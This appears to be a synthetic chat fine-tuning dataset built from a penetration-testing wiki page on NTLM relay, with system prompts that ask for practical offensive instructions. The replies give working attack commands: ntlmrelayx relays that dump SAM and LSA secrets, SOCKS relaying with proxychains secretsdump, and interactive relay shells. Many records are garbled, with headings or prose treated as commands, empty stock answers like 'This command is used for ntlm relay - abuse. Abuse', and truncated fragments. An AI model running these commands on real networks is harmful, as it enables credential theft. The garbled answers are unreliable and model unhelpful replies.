"metadata": {"corpus_index": 957, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through NTLM relay - EPA (Extended Protection for Auth.)"}, {"role": "assistant", "content": "In short, EPA (Extended Protection for Authentication) can use one or both of the following two mitigations to provide mitigation against NTLM relay for protocols that don't support session signing such HTTPS and LDAPS:\n\n* A Channel Binding Token (CBT) when there is a TLS channel to bind to (HTTPS, LDAPS)\n* A Service Binding information in the form of a Service Principal Name (SPN), usually when there is no TLS channel to bind to (HTTP)\n\n> [!TIP]\n> For more details on how NTLM works, testers can read the MS-NLMP doc."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through NTLM relay - EPA (Extended Protection for Auth.)", "response": "In short, EPA (Extended Protection for Authentication) can use one or both of the following two mitigations to provide mitigation against NTLM relay for protocols that don't support session signing such HTTPS and LDAPS:\n\n* A Channel Binding Token (CBT) when there is a TLS channel to bind to (HTTPS, LDAPS)\n* A Service Binding information in the form of a Service Principal Name (SPN), usually when there is no TLS channel to bind to (HTTP)\n\n> [!TIP]\n> For more details on how NTLM works, testers can read the MS-NLMP doc.", "metadata": {"corpus_index": 957, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about NTLM relay - Detection?"}, {"role": "assistant", "content": "From UNIX-like systems, NetExec (Python) and LdapRelayScan (Python) can be used to identify signing and channel binding requirements for SMB, LDAP and LDAPS.\n\n``bash\nnetexec smb $target\nLdapRelayScan.py -u \"user\" -p \"password\" -dc-ip \"DC_IP_address\" -method BOTH\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about NTLM relay - Detection?", "response": "From UNIX-like systems, NetExec (Python) and LdapRelayScan (Python) can be used to identify signing and channel binding requirements for SMB, LDAP and LDAPS.\n\n``bash\nnetexec smb $target\nLdapRelayScan.py -u \"user\" -p \"password\" -dc-ip \"DC_IP_address\" -method BOTH\n``", "metadata": {"corpus_index": 958, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do NTLM relay - Detection"}, {"role": "assistant", "content": "From UNIX-like systems, NetExec (Python) and LdapRelayScan (Python) can be used to identify signing and channel binding requirements for SMB, LDAP and LDAPS.\n\n``bash\nnetexec smb $target\nLdapRelayScan.py -u \"user\" -p \"password\" -dc-ip \"DC_IP_address\" -method BOTH\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do NTLM relay - Detection", "response": "From UNIX-like systems, NetExec (Python) and LdapRelayScan (Python) can be used to identify signing and channel binding requirements for SMB, LDAP and LDAPS.\n\n``bash\nnetexec smb $target\nLdapRelayScan.py -u \"user\" -p \"password\" -dc-ip \"DC_IP_address\" -method BOTH\n``", "metadata": {"corpus_index": 958, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the netexec syntax for ntlm relay - detection?"}, {"role": "assistant", "content": "netexec smb $target\nLdapRelayScan.py -u \"user\" -p \"password\" -dc-ip \"DC_IP_address\" -method BOTH"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the netexec syntax for ntlm relay - detection?", "response": "netexec smb $target\nLdapRelayScan.py -u \"user\" -p \"password\" -dc-ip \"DC_IP_address\" -method BOTH", "metadata": {"corpus_index": 959, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "netexec"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for NTLM relay - Detection?"}, {"role": "assistant", "content": "netexec smb $target\nLdapRelayScan.py -u \"user\" -p \"password\" -dc-ip \"DC_IP_address\" -method BOTH"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for NTLM relay - Detection?", "response": "netexec smb $target\nLdapRelayScan.py -u \"user\" -p \"password\" -dc-ip \"DC_IP_address\" -method BOTH", "metadata": {"corpus_index": 959, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `netexec smb $target`?"}, {"role": "assistant", "content": "This command is used for ntlm relay - detection. Detection"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `netexec smb $target`?", "response": "This command is used for ntlm relay - detection. Detection", "metadata": {"corpus_index": 959, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe NTLM relay - Abuse in the context of penetration testing"}, {"role": "assistant", "content": "ntlmrelayx (Python), MultiRelay (Python) and Inveigh-Relay (Powershell) are great tools for relaying NTLM authentications. Those tools setup relay clients and relay servers waiting for incoming authentications. Once the servers are up and ready, the tester can initiate a forced authentication attack.\n\n> [!CAUTION]\n> When combining NTLM relay with Responder for name poisoning, testers need to make sure that Responder's servers are deactivated, otherwise they will interfere with ntlmrelayx ones.\n> \n> ``\n> sed -i 's/SMB = On/SMB = Off/g' /PATH/TO/Responder/Responder.conf\n> sed -i 's/HTTP = On/HTTP = Off/g' /PATH/TO/Responder/Responder.conf\n> `\n\nBelow are different use-cases of ntlmrelayx.\n\n::: tabs\n\n=== Cred dump\n\nThe following command will try to relay the authentication over SMB and attempt a remote dump of the SAM & LSA secrets from the target if the relayed victim has the right privileges.\n\nAt the time of this article update (12th Feb. 2022), a pull request adding LSA dump to the existing SAM dump is pending.\n\n`bash\nntlmrelayx.py -t smb://$TARGET\n`\n\n=== SOCKS\n\nThe following command will try to relay the authentication and open SOCKS proxies.\n\n`bash\nntlmrelayx.py -tf targets.txt -socks\n`\n\nThe attacker will be able to use some tools along with proxychains to operate attack through the relayed authenticated session. In this case, secretsdump can be used to dump hashes from the remote target's SAM and LSA secrets.\n\n`bash\nproxychains secretsdump.py -no-pass $DOMAIN/$USER@$TARGET\n`\n\n=== Interactive\n\nThe following command will try to relay the authentication and open a local TCP port (commonly 11000) that the attacker can connect to using tools like Netcat.\n\n`bash\nntlmrelayx.py -t smb://$TARGET -i\n`\n\nSupported protocols are: LDAP, SMB and MSSQL.\n\nOn LDAP and SMB, the attacker will be able execute predefined actions based on the targeted protocol. \nOn MSSQL, the attacker will gain access to an MSSQL shell, similar to using mssqlclient.py.\n\n`bash\nnc 127.0.0.1 11000\n`\n\n=== "}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe NTLM relay - Abuse in the context of penetration testing", "response": "ntlmrelayx (Python), MultiRelay (Python) and Inveigh-Relay (Powershell) are great tools for relaying NTLM authentications. Those tools setup relay clients and relay servers waiting for incoming authentications. Once the servers are up and ready, the tester can initiate a forced authentication attack.\n\n> [!CAUTION]\n> When combining NTLM relay with Responder for name poisoning, testers need to make sure that Responder's servers are deactivated, otherwise they will interfere with ntlmrelayx ones.\n> \n> ``\n> sed -i 's/SMB = On/SMB = Off/g' /PATH/TO/Responder/Responder.conf\n> sed -i 's/HTTP = On/HTTP = Off/g' /PATH/TO/Responder/Responder.conf\n> `\n\nBelow are different use-cases of ntlmrelayx.\n\n::: tabs\n\n=== Cred dump\n\nThe following command will try to relay the authentication over SMB and attempt a remote dump of the SAM & LSA secrets from the target if the relayed victim has the right privileges.\n\nAt the time of this article update (12th Feb. 2022), a pull request adding LSA dump to the existing SAM dump is pending.\n\n`bash\nntlmrelayx.py -t smb://$TARGET\n`\n\n=== SOCKS\n\nThe following command will try to relay the authentication and open SOCKS proxies.\n\n`bash\nntlmrelayx.py -tf targets.txt -socks\n`\n\nThe attacker will be able to use some tools along with proxychains to operate attack through the relayed authenticated session. In this case, secretsdump can be used to dump hashes from the remote target's SAM and LSA secrets.\n\n`bash\nproxychains secretsdump.py -no-pass $DOMAIN/$USER@$TARGET\n`\n\n=== Interactive\n\nThe following command will try to relay the authentication and open a local TCP port (commonly 11000) that the attacker can connect to using tools like Netcat.\n\n`bash\nntlmrelayx.py -t smb://$TARGET -i\n`\n\nSupported protocols are: LDAP, SMB and MSSQL.\n\nOn LDAP and SMB, the attacker will be able execute predefined actions based on the targeted protocol. \nOn MSSQL, the attacker will gain access to an MSSQL shell, similar to using mssqlclient.py.\n\n`bash\nnc 127.0.0.1 11000\n`\n\n=== ", "metadata": {"corpus_index": 960, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for NTLM relay - Abuse?"}, {"role": "assistant", "content": "ntlmrelayx (Python), MultiRelay (Python) and Inveigh-Relay (Powershell) are great tools for relaying NTLM authentications. Those tools setup relay clients and relay servers waiting for incoming authentications. Once the servers are up and ready, the tester can initiate a forced authentication attack.\n\n> [!CAUTION]\n> When combining NTLM relay with Responder for name poisoning, testers need to make sure that Responder's servers are deactivated, otherwise they will interfere with ntlmrelayx ones.\n> \n> ``\n> sed -i 's/SMB = On/SMB = Off/g' /PATH/TO/Responder/Responder.conf\n> sed -i 's/HTTP = On/HTTP = Off/g' /PATH/TO/Responder/Responder.conf\n> `\n\nBelow are different use-cases of ntlmrelayx.\n\n::: tabs\n\n=== Cred dump\n\nThe following command will try to relay the authentication over SMB and attempt a remote dump of the SAM & LSA secrets from the target if the relayed victim has the right privileges.\n\nAt the time of this article update (12th Feb. 2022), a pull request adding LSA dump to the existing SAM dump is pending.\n\n`bash\nntlmrelayx.py -t smb://$TARGET\n`\n\n=== SOCKS\n\nThe following command will try to relay the authentication and open SOCKS proxies.\n\n`bash\nntlmrelayx.py -tf targets.txt -socks\n`\n\nThe attacker will be able to use some tools along with proxychains to operate attack through the relayed authenticated session. In this case, secretsdump can be used to dump hashes from the remote target's SAM and LSA secrets.\n\n`bash\nproxychains secretsdump.py -no-pass $DOMAIN/$USER@$TARGET\n`\n\n=== Interactive\n\nThe following command will try to relay the authentication and open a local TCP port (commonly 11000) that the attacker can connect to using tools like Netcat.\n\n`bash\nntlmrelayx.py -t smb://$TARGET -i\n`\n\nSupported protocols are: LDAP, SMB and MSSQL.\n\nOn LDAP and SMB, the attacker will be able execute predefined actions based on the targeted protocol. \nOn MSSQL, the attacker will gain access to an MSSQL shell, similar to using mssqlclient.py.\n\n`bash\nnc 127.0.0.1 11000\n`\n\n=== "}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for NTLM relay - Abuse?", "response": "ntlmrelayx (Python), MultiRelay (Python) and Inveigh-Relay (Powershell) are great tools for relaying NTLM authentications. Those tools setup relay clients and relay servers waiting for incoming authentications. Once the servers are up and ready, the tester can initiate a forced authentication attack.\n\n> [!CAUTION]\n> When combining NTLM relay with Responder for name poisoning, testers need to make sure that Responder's servers are deactivated, otherwise they will interfere with ntlmrelayx ones.\n> \n> ``\n> sed -i 's/SMB = On/SMB = Off/g' /PATH/TO/Responder/Responder.conf\n> sed -i 's/HTTP = On/HTTP = Off/g' /PATH/TO/Responder/Responder.conf\n> `\n\nBelow are different use-cases of ntlmrelayx.\n\n::: tabs\n\n=== Cred dump\n\nThe following command will try to relay the authentication over SMB and attempt a remote dump of the SAM & LSA secrets from the target if the relayed victim has the right privileges.\n\nAt the time of this article update (12th Feb. 2022), a pull request adding LSA dump to the existing SAM dump is pending.\n\n`bash\nntlmrelayx.py -t smb://$TARGET\n`\n\n=== SOCKS\n\nThe following command will try to relay the authentication and open SOCKS proxies.\n\n`bash\nntlmrelayx.py -tf targets.txt -socks\n`\n\nThe attacker will be able to use some tools along with proxychains to operate attack through the relayed authenticated session. In this case, secretsdump can be used to dump hashes from the remote target's SAM and LSA secrets.\n\n`bash\nproxychains secretsdump.py -no-pass $DOMAIN/$USER@$TARGET\n`\n\n=== Interactive\n\nThe following command will try to relay the authentication and open a local TCP port (commonly 11000) that the attacker can connect to using tools like Netcat.\n\n`bash\nntlmrelayx.py -t smb://$TARGET -i\n`\n\nSupported protocols are: LDAP, SMB and MSSQL.\n\nOn LDAP and SMB, the attacker will be able execute predefined actions based on the targeted protocol. \nOn MSSQL, the attacker will gain access to an MSSQL shell, similar to using mssqlclient.py.\n\n`bash\nnc 127.0.0.1 11000\n`\n\n=== ", "metadata": {"corpus_index": 960, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the sed syntax for ntlm relay - abuse?"}, {"role": "assistant", "content": "> sed -i 's/SMB = On/SMB = Off/g' /PATH/TO/Responder/Responder.conf\n> sed -i 's/HTTP = On/HTTP = Off/g' /PATH/TO/Responder/Responder.conf\n> ```\n\nBelow are different use-cases of ntlmrelayx.\n\n::: tabs\n\n=== Cred dump\n\nThe following command will try to relay the authentication over SMB and attempt a remote [dump of the SAM & LSA secrets](../credentials/dumping/sam-and-lsa-secrets.md) from the target if the relayed victim has the right privileges.\n\nAt the time of this article update (12th Feb. 2022), [a pull request](https://github.com/SecureAuthCorp/impacket/pull/1253) adding LSA dump to the existing SAM dump is pending."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the sed syntax for ntlm relay - abuse?", "response": "> sed -i 's/SMB = On/SMB = Off/g' /PATH/TO/Responder/Responder.conf\n> sed -i 's/HTTP = On/HTTP = Off/g' /PATH/TO/Responder/Responder.conf\n> ```\n\nBelow are different use-cases of ntlmrelayx.\n\n::: tabs\n\n=== Cred dump\n\nThe following command will try to relay the authentication over SMB and attempt a remote [dump of the SAM & LSA secrets](../credentials/dumping/sam-and-lsa-secrets.md) from the target if the relayed victim has the right privileges.\n\nAt the time of this article update (12th Feb. 2022), [a pull request](https://github.com/SecureAuthCorp/impacket/pull/1253) adding LSA dump to the existing SAM dump is pending.", "metadata": {"corpus_index": 961, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "sed"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute NTLM relay - Abuse?"}, {"role": "assistant", "content": "> sed -i 's/SMB = On/SMB = Off/g' /PATH/TO/Responder/Responder.conf\n> sed -i 's/HTTP = On/HTTP = Off/g' /PATH/TO/Responder/Responder.conf\n> ```\n\nBelow are different use-cases of ntlmrelayx.\n\n::: tabs\n\n=== Cred dump\n\nThe following command will try to relay the authentication over SMB and attempt a remote [dump of the SAM & LSA secrets](../credentials/dumping/sam-and-lsa-secrets.md) from the target if the relayed victim has the right privileges.\n\nAt the time of this article update (12th Feb. 2022), [a pull request](https://github.com/SecureAuthCorp/impacket/pull/1253) adding LSA dump to the existing SAM dump is pending."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute NTLM relay - Abuse?", "response": "> sed -i 's/SMB = On/SMB = Off/g' /PATH/TO/Responder/Responder.conf\n> sed -i 's/HTTP = On/HTTP = Off/g' /PATH/TO/Responder/Responder.conf\n> ```\n\nBelow are different use-cases of ntlmrelayx.\n\n::: tabs\n\n=== Cred dump\n\nThe following command will try to relay the authentication over SMB and attempt a remote [dump of the SAM & LSA secrets](../credentials/dumping/sam-and-lsa-secrets.md) from the target if the relayed victim has the right privileges.\n\nAt the time of this article update (12th Feb. 2022), [a pull request](https://github.com/SecureAuthCorp/impacket/pull/1253) adding LSA dump to the existing SAM dump is pending.", "metadata": {"corpus_index": 961, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> sed -i 's/SMB = On/SMB = Off/g' /PATH/TO/Responder/Responder.conf`?"}, {"role": "assistant", "content": "This command is used for ntlm relay - abuse. Abuse"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> sed -i 's/SMB = On/SMB = Off/g' /PATH/TO/Responder/Responder.conf`?", "response": "This command is used for ntlm relay - abuse. Abuse", "metadata": {"corpus_index": 961, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through NTLM relay - Abuse"}, {"role": "assistant", "content": "=== SOCKS\n\nThe following command will try to relay the authentication and open [SOCKS proxies](../../../infra/pivoting/socks-proxy)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through NTLM relay - Abuse", "response": "=== SOCKS\n\nThe following command will try to relay the authentication and open [SOCKS proxies](../../../infra/pivoting/socks-proxy).", "metadata": {"corpus_index": 962, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== SOCKS`?"}, {"role": "assistant", "content": "This command is used for ntlm relay - abuse. Abuse"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== SOCKS`?", "response": "This command is used for ntlm relay - abuse. Abuse", "metadata": {"corpus_index": 962, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the The command for ntlm relay - abuse"}, {"role": "assistant", "content": "The attacker will be able to use some tools along with proxychains to operate attack through the relayed authenticated session. In this case, secretsdump can be used to dump hashes from the remote target's [SAM and LSA secrets](../credentials/dumping/sam-and-lsa-secrets)."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the The command for ntlm relay - abuse", "response": "The attacker will be able to use some tools along with proxychains to operate attack through the relayed authenticated session. In this case, secretsdump can be used to dump hashes from the remote target's [SAM and LSA secrets](../credentials/dumping/sam-and-lsa-secrets).", "metadata": {"corpus_index": 963, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for NTLM relay - Abuse?"}, {"role": "assistant", "content": "The attacker will be able to use some tools along with proxychains to operate attack through the relayed authenticated session. In this case, secretsdump can be used to dump hashes from the remote target's [SAM and LSA secrets](../credentials/dumping/sam-and-lsa-secrets)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for NTLM relay - Abuse?", "response": "The attacker will be able to use some tools along with proxychains to operate attack through the relayed authenticated session. In this case, secretsdump can be used to dump hashes from the remote target's [SAM and LSA secrets](../credentials/dumping/sam-and-lsa-secrets).", "metadata": {"corpus_index": 963, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The attacker will be able to use some tools along with proxychains to operate attack through the relayed authenticated session. In this case, secretsdump can be used to dump hashes from the remote target's [SAM and LSA secrets](../credentials/dumping/sam-and-lsa-secrets).`?"}, {"role": "assistant", "content": "This command is used for ntlm relay - abuse. Abuse"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The attacker will be able to use some tools along with proxychains to operate attack through the relayed authenticated session. In this case, secretsdump can be used to dump hashes from the remote target's [SAM and LSA secrets](../credentials/dumping/sam-and-lsa-secrets).`?", "response": "This command is used for ntlm relay - abuse. Abuse", "metadata": {"corpus_index": 963, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute NTLM relay - Abuse?"}, {"role": "assistant", "content": "=== Interactive\n\nThe following command will try to relay the authentication and open a local TCP port (commonly 11000) that the attacker can connect to using tools like `Netcat`."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute NTLM relay - Abuse?", "response": "=== Interactive\n\nThe following command will try to relay the authentication and open a local TCP port (commonly 11000) that the attacker can connect to using tools like `Netcat`.", "metadata": {"corpus_index": 964, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Interactive`?"}, {"role": "assistant", "content": "This command is used for ntlm relay - abuse. Abuse"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Interactive`?", "response": "This command is used for ntlm relay - abuse. Abuse", "metadata": {"corpus_index": 964, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Supported command to ntlm relay - abuse"}, {"role": "assistant", "content": "Supported protocols are: LDAP, SMB and MSSQL.\n\nOn LDAP and SMB, the attacker will be able execute predefined actions based on the targeted protocol. \nOn MSSQL, the attacker will gain access to an MSSQL shell, similar to using `mssqlclient.py`."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Supported command to ntlm relay - abuse", "response": "Supported protocols are: LDAP, SMB and MSSQL.\n\nOn LDAP and SMB, the attacker will be able execute predefined actions based on the targeted protocol. \nOn MSSQL, the attacker will gain access to an MSSQL shell, similar to using `mssqlclient.py`.", "metadata": {"corpus_index": 965, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Supported"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform NTLM relay - Abuse?"}, {"role": "assistant", "content": "Supported protocols are: LDAP, SMB and MSSQL.\n\nOn LDAP and SMB, the attacker will be able execute predefined actions based on the targeted protocol. \nOn MSSQL, the attacker will gain access to an MSSQL shell, similar to using `mssqlclient.py`."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform NTLM relay - Abuse?", "response": "Supported protocols are: LDAP, SMB and MSSQL.\n\nOn LDAP and SMB, the attacker will be able execute predefined actions based on the targeted protocol. \nOn MSSQL, the attacker will gain access to an MSSQL shell, similar to using `mssqlclient.py`.", "metadata": {"corpus_index": 965, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Supported protocols are: LDAP, SMB and MSSQL.`?"}, {"role": "assistant", "content": "This command is used for ntlm relay - abuse. Abuse"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Supported protocols are: LDAP, SMB and MSSQL.`?", "response": "This command is used for ntlm relay - abuse. Abuse", "metadata": {"corpus_index": 965, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for NTLM relay - Abuse"}, {"role": "assistant", "content": "=== Enum\n\nThe following command will run an enumeration of the Active Directory domain through the relayed authenticated session. The operation will create multiple `.html`, `.json` and `.grep` files. It will also gather lots of information regarding the domain users and groups, the computers, [ADCS](../adcs/), etc."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for NTLM relay - Abuse", "response": "=== Enum\n\nThe following command will run an enumeration of the Active Directory domain through the relayed authenticated session. The operation will create multiple 